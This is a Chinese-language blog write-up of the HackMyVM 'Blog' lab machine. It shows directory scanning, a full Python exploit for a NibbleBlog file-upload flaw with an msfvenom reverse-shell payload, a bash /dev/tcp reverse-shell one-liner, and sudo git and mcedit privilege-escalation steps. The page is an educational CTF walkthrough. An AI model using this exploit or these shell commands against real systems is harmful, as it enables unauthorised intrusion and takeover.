<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="nmap 1nmap -T4 -A -sS -vv -Pn 192.168.56.6    目录爆破发现&#x2F;my_weblog目录 1gobuster dir -w .&#x2F;directory-list-2.3-medium.txt -u http:&#x2F;&#x2F;192.168.56.6    二级目录扫描 1gobuster dir -w .&#x2F;directory-list-2.3-medium.txt">
<meta property="og:type" content="article">
<meta property="og:title" content="Hackmyvm - Blog WriteUp">
<meta property="og:url" content="http://example.com/posts/2520060774/index.html">
<meta property="og:site_name" content="Brich">
<meta property="og:description" content="nmap 1nmap -T4 -A -sS -vv -Pn 192.168.56.6    目录爆破发现&#x2F;my_weblog目录 1gobuster dir -w .&#x2F;directory-list-2.3-medium.txt -u http:&#x2F;&#x2F;192.168.56.6    二级目录扫描 1gobuster dir -w .&#x2F;directory-list-2.3-medium.txt">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307162642944.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307162753144.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307171801363.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307172058273.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307172711862.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307172853265.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308175051211.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173226649.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173320081.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173453707.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173632625.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173725227.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308173753885.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308174107037.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308174131862.png">
<meta property="og:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220308174222576.png">
<meta property="article:published_time" content="2022-03-07T08:23:48.000Z">
<meta property="article:modified_time" content="2022-03-21T08:24:53.476Z">
<meta property="article:author" content="lin">
<meta property="article:tag" content="Hackmyvm Machines">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://typro-1304950244.file.myqcloud.com/img/image-20220307162642944.png">
    
    
      
        
          <link rel="shortcut icon" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
      
        
          <link rel="icon" type="image/png" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
    
    <!-- title -->
    <title>Hackmyvm - Blog WriteUp</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/posts/3930660148/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/posts/877236972/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/posts/2520060774/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/posts/2520060774/&text=Hackmyvm - Blog WriteUp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/posts/2520060774/&is_video=false&description=Hackmyvm - Blog WriteUp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hackmyvm - Blog WriteUp&body=Check out this article: http://example.com/posts/2520060774/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/posts/2520060774/&name=Hackmyvm - Blog WriteUp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/posts/2520060774/&t=Hackmyvm - Blog WriteUp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0getshell"><span class="toc-number">1.</span> <span class="toc-text">任意文件上传getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E8%87%B3admin"><span class="toc-number">2.</span> <span class="toc-text">提权至admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#user-flag"><span class="toc-number">3.</span> <span class="toc-text">user flag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E8%87%B3root"><span class="toc-number">4.</span> <span class="toc-text">提权至root</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#root-flag"><span class="toc-number">5.</span> <span class="toc-text">root flag</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Hackmyvm - Blog WriteUp
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">lin</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-03-07T08:23:48.000Z" itemprop="datePublished">2022-03-07</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Hackmyvm-Machines/" rel="tag">Hackmyvm Machines</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>nmap</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4 -A -sS -vv -Pn 192.168.56.6</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307162642944.png" alt="image-20220307162642944"></p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307162753144.png" alt="image-20220307162753144"></p>
<p>目录爆破发现&#x2F;my_weblog目录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster <span class="built_in">dir</span> -w ./directory-list-2.3-medium.txt -u http://192.168.56.6</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307171801363.png" alt="image-20220307171801363"></p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307172058273.png" alt="image-20220307172058273"></p>
<p>二级目录扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -w ./directory-list-2.3-medium.txt -u http://192.168.56.6/my_weblog/ -x php</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307172711862.png" alt="image-20220307172711862"></p>
<p>其它没什么东西，好像只能从admin.php后台页面入手</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220307172853265.png" alt="image-20220307172853265"></p>
<p>google搜索了一下nibbleblog这个东西，发现存在一个任意文件上传的漏洞，但是需要账户密码，</p>
<p>Exploit</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Your PHP Payload goes into local file nibble.txt</span></span><br><span class="line"><span class="comment"># msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=ATTACKER LPORT=ATTACKER</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Loosely ported from the NibbleBlog File Upload MSF Module</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Twitter: @a7kemc73</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">DEBUG=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">nibbleUsername = <span class="string">&quot;&lt;USERNAME&gt;&quot;</span></span><br><span class="line">nibblePassword = <span class="string">&quot;&lt;PASSWORD&gt;&quot;</span></span><br><span class="line"></span><br><span class="line">nibbleURL = <span class="string">&quot;http://127.0.0.1/nibbleblog/&quot;</span></span><br><span class="line">loginURL = nibbleURL + <span class="string">&quot;admin.php&quot;</span></span><br><span class="line">uploadURL = nibbleURL + <span class="string">&quot;admin.php?controller=plugins&amp;action=config&amp;plugin=my_image&quot;</span></span><br><span class="line">exploitURL = nibbleURL + <span class="string">&quot;content/private/plugins/my_image/image.php&quot;</span></span><br><span class="line"></span><br><span class="line">body=<span class="string">&#x27;&lt;?php echo &quot;He4dTr1p is pwning...&lt;br&gt;&quot;;&#x27;</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;nibble.txt&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> payload:</span><br><span class="line">	body=body + payload.read()</span><br><span class="line">body=body + <span class="string">&#x27;echo &quot;Check for shell!&quot;; ?&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> requests.Session() <span class="keyword">as</span> web:</span><br><span class="line">	<span class="comment"># Getting login session and cookies</span></span><br><span class="line">	loginGetResp = web.get(loginURL)</span><br><span class="line">	loginPostResp = web.post(loginURL, data=&#123;<span class="string">&#x27;username&#x27;</span>:nibbleUsername,<span class="string">&#x27;password&#x27;</span>:nibblePassword&#125;)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> DEBUG &gt; <span class="number">0</span>:</span><br><span class="line">		<span class="built_in">print</span> <span class="string">&#x27;[-] LOGIN RESPONSE: &#x27;</span> + <span class="built_in">str</span>(loginPostResp.status_code) + <span class="string">&quot; &quot;</span> + <span class="built_in">str</span>(loginPostResp.reason)</span><br><span class="line">	<span class="keyword">if</span> DEBUG &gt; <span class="number">1</span>:</span><br><span class="line">		<span class="built_in">print</span> <span class="string">&#x27;\n&#x27;</span> + loginPostResp.text</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> <span class="string">&#x27;Incorrect username or password.&#x27;</span> <span class="keyword">in</span> loginPostResp.text:</span><br><span class="line">		<span class="built_in">print</span> <span class="string">&#x27;[!] Login Failed.&#x27;</span></span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="comment"># Performing File Upload</span></span><br><span class="line">		<span class="built_in">print</span> <span class="string">&#x27;[+] Login Successful.&#x27;</span></span><br><span class="line">		uploadPostResp = web.post(uploadURL, data=&#123;<span class="string">&#x27;plugin&#x27;</span>:<span class="string">&#x27;my_image&#x27;</span>,<span class="string">&#x27;title&#x27;</span>:<span class="string">&#x27;My image&#x27;</span>,<span class="string">&#x27;position&#x27;</span>:<span class="string">&#x27;4&#x27;</span>,<span class="string">&#x27;caption&#x27;</span>:<span class="string">&#x27;He4dTr1p&#x27;</span>,<span class="string">&#x27;image_resize&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;image_width&#x27;</span>:<span class="string">&#x27;230&#x27;</span>,<span class="string">&#x27;image_height&#x27;</span>:<span class="string">&#x27;200&#x27;</span>,<span class="string">&#x27;image_option&#x27;</span>:<span class="string">&#x27;auto&#x27;</span>&#125;, files=&#123;<span class="string">&#x27;image&#x27;</span>: (<span class="string">&#x27;nibbles.php&#x27;</span>, body, <span class="string">&#x27;application/x-php&#x27;</span>)&#125;, timeout=<span class="number">30</span>)</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> DEBUG &gt; <span class="number">0</span>:</span><br><span class="line">			<span class="keyword">if</span> <span class="string">&#x27;&lt;b&gt;Warning&lt;/b&gt;&#x27;</span> <span class="keyword">in</span> uploadPostResp.text:</span><br><span class="line">				<span class="built_in">print</span> <span class="string">&#x27;[-] Upload likely successful.&#x27;</span></span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				<span class="built_in">print</span> <span class="string">&#x27;[-] Upload likely failed.&#x27;</span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> DEBUG &gt; <span class="number">0</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;[-] UPLOAD RESPONSE: &#x27;</span> + <span class="built_in">str</span>(uploadPostResp.status_code) + <span class="string">&#x27; &#x27;</span> + <span class="built_in">str</span>(uploadPostResp.reason)</span><br><span class="line">		<span class="keyword">if</span> DEBUG &gt; <span class="number">1</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;\n&#x27;</span> + uploadPostResp.text</span><br><span class="line"></span><br><span class="line">		<span class="comment"># Executing Upload</span></span><br><span class="line">		exploitResp = web.get(exploitURL)</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> exploitResp.status_code == <span class="number">200</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;[+] Exploit launched, check for shell.&#x27;</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;[!] Exploit failed.&#x27;</span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> DEBUG &gt; <span class="number">0</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;[-] EXPLOIT RESPONSE: &#x27;</span> + <span class="built_in">str</span>(exploitResp.status_code) + <span class="string">&#x27; &#x27;</span> + <span class="built_in">str</span>(exploitResp.reason)</span><br><span class="line">		<span class="keyword">if</span> DEBUG &gt; <span class="number">1</span>:</span><br><span class="line">			<span class="built_in">print</span> <span class="string">&#x27;\n&#x27;</span> + exploitResp.text</span><br></pre></td></tr></table></figure>



<p>后台密码掏出大字典跑就是了，我机器内存给的巨低，这里跑起来很很很很很慢，所以去看了wp作弊了一下下，而且爆破这个东西，我巨讨厌</p>
<p>意思一下，密码是kisses</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308175051211.png" alt="image-20220308175051211"></p>
<p>同时根据这个exp可以知道漏洞存在位置在admin.php?controller&#x3D;plugins&amp;action&#x3D;config&amp;plugin&#x3D;my_image</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173226649.png" alt="image-20220308173226649"></p>
<h2 id="任意文件上传getshell"><a href="#任意文件上传getshell" class="headerlink" title="任意文件上传getshell"></a>任意文件上传getshell</h2><p>冰蝎传马连接</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173320081.png" alt="image-20220308173320081"></p>
<p>冰蝎环境太拉垮了，把shell反弹出来</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&#x27;exec bash -i &amp;&gt;/dev/tcp/192.168.56.5/9999 &lt;&amp;1&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173453707.png" alt="image-20220308173453707"></p>
<h2 id="提权至admin"><a href="#提权至admin" class="headerlink" title="提权至admin"></a>提权至admin</h2><p>sudo -l 发现admin用户不需要认证可以执行git命令，那么可以使用git提权到admin用户</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -u admin git -p <span class="built_in">help</span> config</span><br><span class="line">!/bin/bash</span><br></pre></td></tr></table></figure>

<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173632625.png" alt="image-20220308173632625"></p>
<h2 id="user-flag"><a href="#user-flag" class="headerlink" title="user flag"></a>user flag</h2><p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173725227.png" alt="image-20220308173725227"></p>
<h2 id="提权至root"><a href="#提权至root" class="headerlink" title="提权至root"></a>提权至root</h2><p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308173753885.png" alt="image-20220308173753885"></p>
<p>mcedit编辑器提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -u root /usr/bin/mcedit</span><br></pre></td></tr></table></figure>

<p>Invoke shell</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308174107037.png" alt="image-20220308174107037"></p>
<p>Enjoy root shell!!</p>
<p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308174131862.png" alt="image-20220308174131862"></p>
<h2 id="root-flag"><a href="#root-flag" class="headerlink" title="root flag"></a>root flag</h2><p><img src="https://typro-1304950244.file.myqcloud.com/img/image-20220308174222576.png" alt="image-20220308174222576"></p>

  </div>
</article>






        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/vlog/">vlog</a></li>
         
          <li><a href="/gallery/">Photo</a></li>
         
          <li><a href="/friends/">Friends</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0getshell"><span class="toc-number">1.</span> <span class="toc-text">任意文件上传getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E8%87%B3admin"><span class="toc-number">2.</span> <span class="toc-text">提权至admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#user-flag"><span class="toc-number">3.</span> <span class="toc-text">user flag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E8%87%B3root"><span class="toc-number">4.</span> <span class="toc-text">提权至root</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#root-flag"><span class="toc-number">5.</span> <span class="toc-text">root flag</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/posts/2520060774/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/posts/2520060774/&text=Hackmyvm - Blog WriteUp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/posts/2520060774/&is_video=false&description=Hackmyvm - Blog WriteUp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hackmyvm - Blog WriteUp&body=Check out this article: http://example.com/posts/2520060774/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/posts/2520060774/&title=Hackmyvm - Blog WriteUp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/posts/2520060774/&name=Hackmyvm - Blog WriteUp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/posts/2520060774/&t=Hackmyvm - Blog WriteUp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2022
    lin
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: 'Ku71Pva4EFeKIH5y64LCYVwp-gzGzoHsz',
            appKey: 'wqnsWKV8eVHemIwCa9vo9vRg',
            placeholder: '快来评论一下吧',
            avatar: 'robohash'
        })
    </script>

    
<!-- utterances Comments -->



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"superSample":2,"width":200,"height":350,"position":"right","hOffset":0,"vOffset":-20},"mobile":{"show":false,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
